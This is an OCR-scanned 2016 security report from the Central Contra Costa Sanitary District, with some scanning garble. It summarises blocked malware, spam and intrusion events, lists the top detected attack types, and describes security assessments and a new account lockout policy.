The URL can be used to link to this page

Home My WebLink About07.b. 2016 Central San Security Report 7mbo 2016 CCCSD Securit e ort f A summary ofsecurity related events and in r tia tees or the Central contra costa Sanitary District. _ z J&M L ..f -4 ,I Central Contra Costa Sanitary District Q2 2016 CCCSD SECURITY REPORT Executive Summary MALWARE • The Fire Eye detected and blocked a total of 72 infections in 2016,of which three were classified as critical and ten were classified as major. The Barracuda web filtering appliance blocked 1.2,728 requests to web pages that contained nialware during the year. SPAM The Barracuda spam filter blocked over 2,700 viruses that attempted to enter the organization via email during the year. NOTABLE SECURITY EVENTS • The Intrusion Detection and Intrusion Prevention(IDS/IPS) components were enabled on the FireEye device in the fourth quarter During this time period, 1,130 critical events were detected and blocked across 20 different Central San devices. • The transition.to a new-a nti-sparn/e mail filtering appliance was completed. • Two security assessments were completed by two independent third party organizations. • A network,account lock-out policy went into effect for every Central,San network account. ..............-.............................. . ............ Page 1 CCCSD SECURITY REPORT Q2 2016 , ;I&Ct SD FireE e Maiware The FireEye detected and blocked a total of 72 infections in 2016, of which three were classified as critical and ten were classified as major. One of the critical infections (DTI.Callback) is capable of gaining complete control of a system and allows the compromised system to launch other attacks against PCs connected to the same network. The second critical infection (Trojan-Hop-tto) allows malicious software programs to be installed without consent from the PCs owner,which are then typically used to install malware on other systems. The third critical infection was a Rasoaiware attack that was blocked before it was allowed to execute on the PC. In 2016, Malware created with the Angler Exploit kit was the most common type of malware that was detected by Fire.Eye. Top 5 Malware *FE_Possibte_3igned_32 Oother *Exploit.Kit.MaLvertiseaertt *Exp to it.Dropper.ur[.VVX 4bExp1,oit.Kit.Riq *Exp to it.Kit.Ang ter 32% 35% 12% 6% Pacfbe 2 :CCCSD SECURITY REPORT - Q2 2016 ID Intrusion I t Prgvention The Intrusion.Detection and intrLision Prevention (IDS/IPS) components were enabled on the FireEye device in the fourth quarter. During this time period, 11,130 critical events were detected and blocked across 20 different Central San devices. ]DS/IFS events are an attempt by an attacher to compromise a computing device as a result of a vulnerability. Events Summary 1 1 r20 # Hosts Tap 10 Attacks by Rubs Rules Description Attack Count 1 Bash Remote Code Injection i,Shetlshock�HTTP CGI headers) 496 2 Squid CVE-2010-3072 Crafted HTTP Request Denial Of Service 388 3 TitnThumb src Parameter PHP File Upload Code Execution 84 4 possible Cross-site Scripting Attack 65 5 Microsoft XML Gore Services Uninitlalized Object Access 41 5 Mozitla products Graphics and XML Features Integer Overflows 32 7 Exirn witti Dovecot LOA sender address Parameter Remote Command Execution 14 S WordPress Slider Revolution Plugin Local File inclusion 6 9 Microsoft Internet Explorer HTML Help Remote Grade Execution 4 Page 3 ,► CCCSD SECURITY REPORT Q2 2016 Spam The Barracuda spare filter blocked over 2,700 viruses that atterrrpted to enter the organization via email during the year, 1.S million messages were identified as spam and an additional 814,000 pieces of enla%l, were throttled.. Throttled messages typically indicate a high arnount of spam being sent to the CCCSD mail server at once and are presumed to be spaxii. L��ximit�Email:�� Rate Controlled: 27�� -- Virus:I Bad Recipient:1 % Spam :52% Legitimite Ernail Virus Spam Bad Recipient 0 fete Controlled Page 4 '-7-P -7csSECURITY -4n C*�:CN-_ ID,a 1h, CCCSD Web Filtering: Malware The Barracuda web Filtering appliance blocked 12,728 requests to web pages that contained nialware during the year. The large increase in the nuniber of requests to malicious websites in the fourth gLlaftet- was attributed to an update to the malware scanning engine that caused numerous false positives. IT staff is in process of investigating the validity of these regUests. Q1 :834 Requests Q2:992 Requests Q3:2629 Requests 82#x9 RequestB 1 0 Q2 Q3 M Q4 Page 5 ID CCCSD SECURITY REPORT Q2 2016 Notable Security Events • A ransomware attack was detected and stopped before it could execute on a PC, potentially saving Central San tens of thousands of dollars in staff time that would have been needed to remove the infection and restore the affected files. • An email was sent to all district staff informing them that passwords of compromised LinkedIn accounts were freely available on the internet. Employees were advised to change their Linked1n p-assword if they had not done so since May 2016 or if their Linked1n password was the sarne or similar to their district network password. • The transition to a new anti-spam and email filtering appliance was completed. Service with the prior solation,Google Apps was terminated. • A Vulnerability scan was conducted on Central San's internet facing devices as part of the district's Payment Card Industry(PCI) compliance requirement. No existing high risk vulnerabilities were detected,however one potential high risk vulnerability was discovered,which was remedied in the fourth quarter Central SAN was awarded an overall score of"3"on a scale of"S" The industry average for this type of scan is a rating of"23." • A comprehensive security assessment was performed on the District's external (internet facing) as well as internal(private network) systems. The external scan found that adequate protection exists at the district's main entry point from the internet. The internal scan found several issues with a wide range of severity, IT staff has formulated a rernediaLion plan that is anticipated to be competed in the second quarter of 2017. • An account lock policy went into effect for every network logon in the district. Under this policy,a network account will automatically lock after five unsuccessful logon attempts. The account will then remain locked for 30 minutes,after which it will unlock automatically, 0 Intrusion Detection and Intrusion Prevention(IDS/IPS) components were enabled on the Fire Eye device, These components will help to detect and prevent the exploitation of known vulnerabilities across a wide range of computing devices in use at Central San. .. ......... .................... ...... .............. .............................. Page 6